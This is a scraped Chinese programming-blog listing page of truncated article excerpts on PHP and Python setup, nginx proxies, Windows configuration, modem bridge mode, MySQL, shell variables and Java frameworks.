    PHP是一个流行的服务器端脚本语言,广泛用于Web开发。为了使PHP能够在本地或服务器上运行,我们需要搭建一个合适的PHP环境。本教程将结合最新资料,介绍在不同操作系统上搭建PHP开发环境的多种方法,包括Windows、macOS和Linux系统的安装步骤,以及本地和Docker环境的配置。1.PHP环境搭建概述PHP环境的搭建主要分为以下几类:集成开发环境:例如XAMPP、WAMP、MAMP,这
  • Python 实现图片裁剪(附代码) | Python工具 剑客阿良_ALiang
    前言本文提供将图片按照自定义尺寸进行裁剪的工具方法,一如既往的实用主义。环境依赖ffmpeg环境安装,可以参考我的另一篇文章:windowsffmpeg安装部署_阿良的博客-CSDN博客本文主要使用到的不是ffmpeg,而是ffprobe也在上面这篇文章中的zip包中。ffmpy安装:pipinstallffmpy-ihttps://pypi.douban.com/simple代码不废话了,上代码
  • 2023最详细的Python安装教程(Windows版本) 程序员林哥 Pythonpythonwindows开发语言
    python安装是学习pyhon第一步,很多刚入门小白不清楚如何安装python,今天我来带大家完成python安装与配置,跟着我一步步来,很简单,你肯定能完成。第一部分:python安装(一)准备工作1、下载和安装python(认准官方网站)当然你不想去下载的话也可以分享给你,还有入门学习教程,点击下方卡片跳转进群领取(二)开始安装对于Windows操作系统,可以下载“executableins
  • windows下python opencv ffmpeg读取摄像头实现rtsp推流 拉流 图像处理大大大大大牛啊 opencv实战代码讲解视觉图像项目windowspythonopencv
    windows下pythonopencvffmpeg读取摄像头实现rtsp推流拉流整体流程1.下载所需文件1.1下载rtsp推流服务器1.2下载ffmpeg2.开启RTSP服务器3.opencv读取摄像头并调用ffmpeg进行推流4.opencv进行拉流5.opencv异步拉流整体流程1.下载所需文件1.1下载rtsp推流服务器下载RTSP服务器下载页面https://github.com/blu
  • 编译Windows平台的Nginx+ngx_http_proxy_connect_module Grovvy_Deng windowsnginxhttp
    编译Windows平台的Nginx+ngx_http_proxy_connect_module背景:由于公司的正向出局代理是windows机器。机器上的Squid不稳定,打算替换成nginx+ngx_http_proxy_connect_module实现。通过几天痛苦的尝试,最后参考了github大神项目通过在线CICD工具编译window平台可用的ng。步骤:获取git可识别的patch由于CI
  • 关闭Windows自动更新的6种方法 Gemini1995 windows
    在Windows操作系统中,可以使用多种方法来关闭自动更新。以下是其中一些常用的方法:使用设置应用:打开“设置”应用(Win+I),选择“更新和安全”。在左侧菜单中选择“Windows更新”。点击“更改活动时间”或“高级选项”。在“更新选项”下拉菜单中选择“通知我但不自动下载或安装”或“从不检查更新”。通过服务管理器:打开“服务”管理器,可以通过在运行对话框中输入services.msc来打开。找
  • 【nginx】ngx_http_proxy_connect_module 正向代理 等风来不如迎风去 网络服务入门与实战nginxhttp运维
    50.65无法访问服务器,(403错误)50.196可以访问服务器。那么,配置65通过196访问。需要一个nginx作为代理【nginx】搭配okhttp配置反向代理发送原生的nginx是不支持okhttp的CONNECT请求的。大神竟然给出了一个java工程GINX编译ngx_http_proxy_connect_module及做正向代理是linux构建的。是windows构建的:编译Windo
  • Windows安装ciphey编码工具,附一道ciscn编码题例 im-Miclelson CTF工具网络安全
    TA是什么一款智能化的编码分析解码工具,对于CTF中复杂性编码类题目可以快速攻破。编码自动分析解码的神器。如何安装Windows环境Python3.864位(最新的版本不兼容,32位的也不行)PIP直接安装pipinstallciphey-ihttps://pypi.mirrors.ustc.edu.cn/simple/安装后若是出现报错请根据错误代码行数找到对应文件,r修改成rb即可。使用标准语
  • Python程序打包指南:手把手教你一步步完成 Python_P叔 python数据库开发语言
    最近感兴趣想将开发的项目转成Package,研究了一下相关文章,并且自己跑通了,走了一下弯路,这里记录一下如何打包一个简单的Python项目,展示如何添加必要的文件和结构来创建包,如何构建包,以及如何将其上传到Python包索引(PyPI)。首先要确保安装最新版本:#Unix/macOSpython3-mpipinstall--upgradepip#windowspy-mpipinstall--u
  • 管理员权限的软件不能开机自启动的解决方法 ss_ctrl
    这是几种解决方法:1.将启动参数写入到32位注册表里面去在64位系统下我们64位的程序访问此HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run注册表路径,是可以正确访问的,32位程序访问此注册表路径时,默认会被系统自动映射到HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft
  • matlab游标标注移动,matlab实现图形窗口的数据游标 莫白想 matlab游标标注移动
    DatacursorsforfigurewindowSeveralrelatedfunctions:CreateCursorsetsupaverticalcursoronallaxesinafigure.Thecursorscanbemovedaroundusingthemouse.MultiplecursorsaresupportedineachfigureGetCursorLocationre
  • TA-Lib Python 库 Windows 64位安装包 黄桥壮Quinn
    TA-LibPython库Windows64位安装包TA.rar项目地址:https://gitcode.com/open-source-toolkit/3ff39简介本仓库提供了一个适用于Windows64位系统的TA-LibPython库安装包。TA-Lib是一个广泛用于金融技术分析的库,支持多种技术指标的计算。资源文件文件名TA-Lib-0.4.29-cp312-win-amd64.whl描
  • 【Python爬虫】百度百科词条内容 PokiFighting 数据处理python爬虫开发语言
    词条内容我这里随便选取了一个链接,用的是FBI的词条importurllib.requestimporturllib.parsefromlxmlimportetreedefquery(url):headers={'user-agent':'Mozilla/5.0(WindowsNT6.1;Win64;x64)AppleWebKit/537.36(KHTML,likeGecko)Chrome/80.
  • 如何避免学习linux必然会遇到的几个问题 twintwin
    相信在看这篇文章的都是对linux系统所迷的志同道合的人,不管你是刚开始学,还是已经接触过一些linux的知识,下面的问题是你在学习linux所必须遇到的,若是没有的话那我只能说大神我服你了。下面我就作为一个过来人分享下我学习后的经验。一、无法摆脱Windows的思维方式相信大家接触电脑的时候都是从windows开始,windows的思维方式已经根深蒂固。不过现在你已经打算开始学习linux了,就
  • 两种方法判断Python的位数是32位还是64位 sanqima Python编程电脑python开发语言
      Python从1991年发布以来,凭借其简洁、清晰、易读的语法、丰富的标准库和第三方工具,在Web开发、自动化测试、人工智能、图形识别、机器学习等领域发展迅猛。  Python是一种胶水语言,通过Cython库与C/C++语言进行链接,通过Jython库与Java语言进行链接。  Python是跨平台的,可运行在多种操作系统上,包括但不限于Windows、Linux和macOS。这意味着用Py
  • python logging模块默认日志级别_一看就懂,Python 日志 logging 模块详解及应用 路易·罗莎 pythonlogging模块默认日志级别
    日志概述百度百科的日志概述:Windows网络操作系统都设计有各种各样的日志文件,如应用程序日志,安全日志、系统日志、Scheduler服务日志、FTP日志、WWW日志、DNS服务器日志等等,这些根据你的系统开启的服务的不同而有所不同。我们在系统上进行一些操作时,这些日志文件通常会记录下我们操作的一些相关内容,这些内容对系统安全工作人员相当有用。比如说有人对系统进行了IPC探测,系统就会在安全日志
  • 《黑神话:悟空》游戏AkExpander.dll文件缺失,使用工具修复更快捷 李秋秋啊 游戏
    在Windows操作系统中,当遇到“黑神话:悟空”游戏中的AkExpander.dll文件丢失问题时,用户可能会经历游戏启动失败或运行中断的情况。这个DLL文件是游戏正常运行所必需的,缺失或损坏会导致关键功能无法执行,影响游戏体验。针对《黑神话:悟空》游戏中AkExpander.dll文件缺失的问题,您可以尝试以下几种解决方法:一、重新安装游戏首先,考虑卸载当前安装的游戏版本,并从官方渠道重新下载
  • MySQL数据库全面学习之(上篇) 一心只为学 数据库mysql学习
    Windows服务--启动MySQLnetstartmysql--创建Windows服务sccreatemysqlbinPath=mysqld_bin_path(注意:等号与值之间有空格)连接与断开服务器mysql-h地址-P端口-u用户名-p密码SHOWPROCESSLIST--显示哪些线程正在运行SHOWVARIABLES--显示系统变量信息数据库操作--查看当前数据库SELECTDATABA
  • 技术周总结 09.09~09.15周日(C# WinForm WPF) 打破砂锅问到底007 wpfc#WinForm
    文章目录一、09.09周一1.1)问题01:Windows桌面开发中,WPF和WinForm的区别和联系?联系:区别:二、09.12周四2.1)问题01:visualstudio的相关快捷键有哪些?通用快捷键编辑导航调试窗口管理2.2)问题02:publicpartialclassChoosePLReason:CommonBaseForm2.3)问题03:介绍WindowsForms中的Syste
  • xp系统打开计算机硬盘分区,详解WindowsXP硬盘分区步骤 随缘惜情 xp系统打开计算机硬盘分区
    有许多游戏玩家对经典的WinXP系统非常忠实,即使重新购买了一台超强配置的电脑,依然选择安装WinXP系统,因为WinXP对很多老游戏兼容性更强,游戏玩家也对硬盘的分配非常讲究,因为每一款好玩的游戏容量都是非常庞大,而如果硬盘容量太小的话就装不了几款游戏了,所以许多用户喜欢将其它硬盘容量都分配到一个比较大的分区内,若是Win7就可以非常直观的自动分配,而在WinXP系统下该如何实现呢?下面一起来认
  • 什么是 PHP? 为什么用 PHP? 谁在用 PHP? m0_37438181 永远学习php开发语言
    一、什么是PHP?PHP(HypertextPreprocessor,超文本预处理器)是一种广泛应用于Web开发的通用开源脚本语言。PHP主要用于服务器端编程,可以嵌入HTML中,与数据库进行交互,生成动态网页内容。它具有以下特点:简单易学:语法相对简单,容易上手,对于初学者来说是一个不错的选择。跨平台性:可以在多种操作系统上运行,如Windows、Linux、Unix等。丰富的函数库:提供了大量
  • Windows多版本python共存 翟光 PythonPython
    1.简介Python自从进入3.x版本后,与2.x的版本发生了许多变化,3.x对2.x也不兼容。在实际应用中,可能会2.x和3.x的版本交叉应用,因此,需要在本地安装多个版本的Python。本处介绍一种在Windows系统下安装多个不同版本的python的方法,安装后无需进行任何特殊的处理(例如将python.exe更名为python2.exe什么的)即可使用。2.安装环境本人的安装环境如下:系统
  • gs3101光猫改桥接及路由器pppie拨号设置 xing2zhe3wujiang1 路由器网络
    1)改桥接1连接光猫发出的WiFi,并访问192.168.1.1输入光猫背面提供的账号密码,保持登录。2打开新页面并访问192.168.1.1/cgi-bin/getGateWay.cgiFamilyGateWayYes/No#如果第二行显示No,再次刷新浏览器就可以了3在控制面板-程序和功能-启动或关闭Windows功能选中Telnet4输入telnet192.168.1.1tclogin:ad
  • 操作系统简介 像风一样自由2020 操作系统linuxubuntuwindowsharmonyos
    操作系统简介操作系统(OperatingSystem,简称OS)是管理计算机硬件和软件资源的系统软件,为用户和应用程序提供接口。现今,操作系统种类繁多,主要分为桌面操作系统、服务器操作系统和移动操作系统等。以下是对目前存在的主要操作系统的详细介绍。1.Windows简介:Windows是由微软公司开发的系列图形界面操作系统,是全球使用最广泛的桌面操作系统之一。最新版本:截至2023年10月,最新版
  • ios私钥证书(p12)导入失败,Windows OpenSSl 1.1.1 下载 书边事. 其他
    ios私钥证书(p12)导入失败如果你用的OpenSSL版本是v3那么恭喜你V3必然报这个错,解决办法将OpenSSL3降低成v1。WindowsOpenSSl1.1.1下载阿里云网盘下载地址:OpenSSLV1
  • (小白入门)Windows环境下搭建React Native Android开发环境 码农老黑 前端ReactNative移动开发Androidstudio
    ReactNative(简称RN)是Facebook于2015年4月开源的跨平台移动应用开发框架,是Facebook早先开源的UI框架React在原生移动应用平台的衍生产物,目前支持iOS和Android两大平台。RN的环境搭建在RN的中文社区有所介绍,但是对于小白来说还是有些太过简略了。RN中文社区详见参考,本文不涉及的问题也许在其中能够有所解答。ReactNative思想底层引擎是JavaSc
  • 讲解Linux内核操作系统——进程状态与转换 Linux加油站 网络服务器运维
    一.进程控制进程控制的主要功能是对系统中的所有进程实施有效的管理,它具有创建新进程、撤销已有进程、实现进程状态转换等功能。在操作系统中,一般把进程控制用的程序段称为原语,原语的特点是执行期间不允许中断,它是一个不可分割的基本单位。1.1创建进程UNIX中进程为树状层次结构,Windows下所有进程没有层次结构允许一个进程创建另一个进程,创建者称为父进程,被创建的进程称为子进程。子进程可以继承父进程
  • Error - cannot open input file /postproc/nlscfg.inf 错误解决 技术无疆 WindowsCEinputfilecommandwindows
    执行makeimg命令的时候出现一下错误:makeimg:Creatingnlscfg.outbecausenlscfg.infdoesn'texist.makeimg:runcommand:fmerge-nlsnlscfg.outnlscfg.infError-cannotopeninputfile/postproc/nlscfg.inffmergeforWindowsCE(Release)(B
  • 安装数据库首次应用 Array_06 javaoraclesql
    可是为什么再一次失败之后就变成直接跳过那个要求 enter full pathname of java.exe的界面 这个java.exe是你的Oracle 11g安装目录中例如:【F:\app\chen\product\11.2.0\dbhome_1\jdk\jre\bin】下的java.exe 。不是你的电脑安装的java jdk下的java.exe! 注意第一次,使用SQL D
  • Weblogic Server Console密码修改和遗忘解决方法 bijian1013 Welogic
            在工作中一同事将Weblogic的console的密码忘记了,通过网上查询资料解决,实践整理了一下。 一.修改Console密码         打开weblogic控制台,安全领域 --> myrealm -->&n
  • IllegalStateException: Cannot forward a response that is already committed Cwind javaServlets
    对于初学者来说,一个常见的误解是:当调用 forward() 或者 sendRedirect() 时控制流将会自动跳出原函数。标题所示错误通常是基于此误解而引起的。 示例代码: protected void doPost() { if (someCondition) { sendRedirect(); } forward(); // Thi
  • 基于流的装饰设计模式 木zi_鸣 设计模式
    当想要对已有类的对象进行功能增强时,可以定义一个类,将已有对象传入,基于已有的功能,并提供加强功能。 自定义的类成为装饰类 模仿BufferedReader,对Reader进行包装,体现装饰设计模式 装饰类通常会通过构造方法接受被装饰的对象,并基于被装饰的对象功能,提供更强的功能。 装饰模式比继承灵活,避免继承臃肿,降低了类与类之间的关系 装饰类因为增强已有对象,具备的功能该
  • Linux中的uniq命令 被触发 linux
    Linux命令uniq的作用是过滤重复部分显示文件内容,这个命令读取输入文件,并比较相邻的行。在正常情 况下,第二个及以后更多个重复行将被删去,行比较是根据所用字符集的排序序列进行的。该命令加工后的结果写到输出文件中。输入文件和输出文件必须不同。如 果输入文件用“- ”表示,则从标准输入读取。 AD: uniq [选项] 文件 说明:这个命令读取输入文件,并比较相邻的行。在正常情况下,第二个
  • 正则表达式Pattern 肆无忌惮_ Pattern
    正则表达式是符合一定规则的表达式,用来专门操作字符串,对字符创进行匹配,切割,替换,获取。   例如,我们需要对QQ号码格式进行检验 规则是长度6~12位  不能0开头  只能是数字,我们可以一位一位进行比较,利用parseLong进行判断,或者是用正则表达式来匹配[1-9][0-9]{4,14} 或者 [1-9]\d{4,14} &nbs
  • Oracle高级查询之OVER (PARTITION BY ..) 知了ing oraclesql
    一、rank()/dense_rank() over(partition by ...order by ...) 现在客户有这样一个需求,查询每个部门工资最高的雇员的信息,相信有一定oracle应用知识的同学都能写出下面的SQL语句: select e.ename, e.job, e.sal, e.deptno from scott.emp e, (se
  • Python调试 矮蛋蛋 pythonpdb
    原文地址: http://blog.csdn.net/xuyuefei1988/article/details/19399137 1、下面网上收罗的资料初学者应该够用了,但对比IBM的Python 代码调试技巧: IBM:包括 pdb 模块、利用 PyDev 和 Eclipse 集成进行调试、PyCharm 以及 Debug 日志进行调试: http://www.ibm.com/d
  • webservice传递自定义对象时函数为空,以及boolean不对应的问题 alleni123 webservice
    今天在客户端调用方法 NodeStatus status=iservice.getNodeStatus(). 结果NodeStatus的属性都是null。 进行debug之后,发现服务器端返回的确实是有值的对象。 后来发现原来是因为在客户端,NodeStatus的setter全部被我删除了。 本来是因为逻辑上不需要在客户端使用setter, 结果改了之后竟然不能获取带属性值的
  • java如何干掉指针,又如何巧妙的通过引用来操作指针————>说的就是java指针 百合不是茶
    C语言的强大在于可以直接操作指针的地址,通过改变指针的地址指向来达到更改地址的目的,又是由于c语言的指针过于强大,初学者很难掌握, java的出现解决了c,c++中指针的问题 java将指针封装在底层,开发人员是不能够去操作指针的地址,但是可以通过引用来间接的操作:   定义一个指针p来指向a的地址(&是地址符号):        
  • Eclipse打不开,提示“An error has occurred.See the log file ***/.log” bijian1013 eclipse
    打开eclipse工作目录的\.metadata\.log文件,发现如下错误: !ENTRY org.eclipse.osgi 4 0 2012-09-10 09:28:57.139 !MESSAGE Application error !STACK 1 java.lang.NoClassDefFoundError: org/eclipse/core/resources/IContai
  • spring aop实例annotation方法实现 bijian1013 javaspringAOPannotation
            在spring aop实例中我们通过配置xml文件来实现AOP,这里学习使用annotation来实现,使用annotation其实就是指明具体的aspect,pointcut和advice。1.申明一个切面(用一个类来实现)在这个切面里,包括了advice和pointcut AdviceMethods.jav
  • [Velocity一]Velocity语法基础入门 bit1129 velocity
    用户和开发人员参考文档 http://velocity.apache.org/engine/releases/velocity-1.7/developer-guide.html   注释 1.行级注释## 2.多行注释#*  *#   变量定义 使用$开头的字符串是变量定义,例如$var1, $var2,   赋值 使用#set为变量赋值,例
  • 【Kafka十一】关于Kafka的副本管理 bit1129 kafka
    1. 关于request.required.acks   request.required.acks控制者Producer写请求的什么时候可以确认写成功,默认是0, 0表示即不进行确认即返回。 1表示Leader写成功即返回,此时还没有进行写数据同步到其它Follower Partition中 -1表示根据指定的最少Partition确认后才返回,这个在   Th
  • lua统计nginx内部变量数据 ronin47 lua nginx  统计
    server { listen 80; server_name photo.domain.com; location /{set $str $uri; content_by_lua ' local url = ngx.var.uri local res = ngx.location.capture(
  • java-11.二叉树中节点的最大距离 bylijinnan java
    import java.util.ArrayList; import java.util.List; public class MaxLenInBinTree { /* a. 1 / \ 2 3 / \ / \ 4 5 6 7 max=4 pass "root"
  • Netty源码学习-ReadTimeoutHandler bylijinnan javanetty
    ReadTimeoutHandler的实现思路: 开启一个定时任务,如果在指定时间内没有接收到消息,则抛出ReadTimeoutException 这个异常的捕获,在开发中,交给跟在ReadTimeoutHandler后面的ChannelHandler,例如 private final ChannelHandler timeoutHandler = new ReadTim
  • jquery验证上传文件样式及大小(好用) cngolon 文件上传jquery验证
    <!DOCTYPE html> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <script src="jquery1.8/jquery-1.8.0.
  • 浏览器兼容【转】 cuishikuan css浏览器IE
    浏览器兼容问题一:不同浏览器的标签默认的外补丁和内补丁不同 问题症状:随便写几个标签,不加样式控制的情况下,各自的margin 和padding差异较大。 碰到频率:100% 解决方案:CSS里    *{margin:0;padding:0;} 备注:这个是最常见的也是最易解决的一个浏览器兼容性问题,几乎所有的CSS文件开头都会用通配符*来设
  • Shell特殊变量:Shell $0, $#, $*, $@, $?, $$和命令行参数 daizj shell$#$?特殊变量
    前面已经讲到,变量名只能包含数字、字母和下划线,因为某些包含其他字符的变量有特殊含义,这样的变量被称为特殊变量。例如,$ 表示当前Shell进程的ID,即pid,看下面的代码: $echo $$ 运行结果 29949   特殊变量列表 变量 含义 $0 当前脚本的文件名 $n 传递给脚本或函数的参数。n 是一个数字,表示第几个参数。例如,第一个
  • 程序设计KISS 原则-------KEEP IT SIMPLE, STUPID! dcj3sjt126com unix
    翻到一本书,讲到编程一般原则是kiss:Keep It Simple, Stupid.对这个原则深有体会,其实不仅编程如此,而且系统架构也是如此。 KEEP IT SIMPLE, STUPID! 编写只做一件事情,并且要做好的程序;编写可以在一起工作的程序,编写处理文本流的程序,因为这是通用的接口。这就是UNIX哲学.所有的哲学真 正的浓缩为一个铁一样的定律,高明的工程师的神圣的“KISS 原
  • android Activity间List传值 dcj3sjt126com Activity
    第一个Activity: import java.util.ArrayList;import java.util.HashMap;import java.util.List;import java.util.Map;import android.app.Activity;import android.content.Intent;import android.os.Bundle;import a
  • tomcat 设置java虚拟机内存 eksliang tomcat 内存设置
    转载请出自出处:http://eksliang.iteye.com/blog/2117772 http://eksliang.iteye.com/ 常见的内存溢出有以下两种: java.lang.OutOfMemoryError: PermGen space java.lang.OutOfMemoryError: Java heap space   ------------
  • Android 数据库事务处理 gqdy365 android
    使用SQLiteDatabase的beginTransaction()方法可以开启一个事务,程序执行到endTransaction() 方法时会检查事务的标志是否为成功,如果程序执行到endTransaction()之前调用了setTransactionSuccessful() 方法设置事务的标志为成功则提交事务,如果没有调用setTransactionSuccessful() 方法则回滚事务。事
  • Java 打开浏览器 hw1287789687 打开网址open浏览器open browser打开url打开浏览器
    使用java 语言如何打开浏览器呢? 我们先研究下在cmd窗口中,如何打开网址 使用IE 打开 D:\software\bin>cmd /c start iexplore http://hw1287789687.iteye.com/blog/2153709 使用火狐打开 D:\software\bin>cmd /c start firefox http://hw1287789
  • ReplaceGoogleCDN:将 Google CDN 替换为国内的 Chrome 插件 justjavac chromeGooglegoogle apichrome插件
    Chrome Web Store 安装地址: https://chrome.google.com/webstore/detail/replace-google-cdn/kpampjmfiopfpkkepbllemkibefkiice 由于众所周知的原因,只需替换一个域名就可以继续使用Google提供的前端公共库了。 同样,通过script标记引用这些资源,让网站访问速度瞬间提速吧
  • 进程VS.线程 m635674608 线程
    资料来源: http://www.liaoxuefeng.com/wiki/001374738125095c955c1e6d8bb493182103fac9270762a000/001397567993007df355a3394da48f0bf14960f0c78753f000 1、Apache最早就是采用多进程模式 2、IIS服务器默认采用多线程模式 3、多进程优缺点 优点: 多进程模式最大
  • Linux下安装MemCached 字符串 memcached
    前提准备:1. MemCached目前最新版本为:1.4.22,可以从官网下载到。2. MemCached依赖libevent,因此在安装MemCached之前需要先安装libevent。2.1 运行下面命令,查看系统是否已安装libevent。[root@SecurityCheck ~]# rpm -qa|grep libevent libevent-headers-1.4.13-4.el6.n
  • java设计模式之--jdk动态代理(实现aop编程) Supanccy2013 javaDAO设计模式AOP
        与静态代理类对照的是动态代理类,动态代理类的字节码在程序运行时由Java反射机制动态生成,无需程序员手工编写它的源代码。动态代理类不仅简化了编程工作,而且提高了软件系统的可扩展性,因为Java 反射机制可以生成任意类型的动态代理类。java.lang.reflect 包中的Proxy类和InvocationHandler 接口提供了生成动态代理类的能力。 &
  • Spring 4.2新特性-对java8默认方法(default method)定义Bean的支持 wiselyman spring 4
    2.1 默认方法(default method) java8引入了一个default medthod; 用来扩展已有的接口,在对已有接口的使用不产生任何影响的情况下,添加扩展 使用default关键字 Spring 4.2支持加载在默认方法里声明的bean 2.2 将要被声明成bean的类 public class DemoService {
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他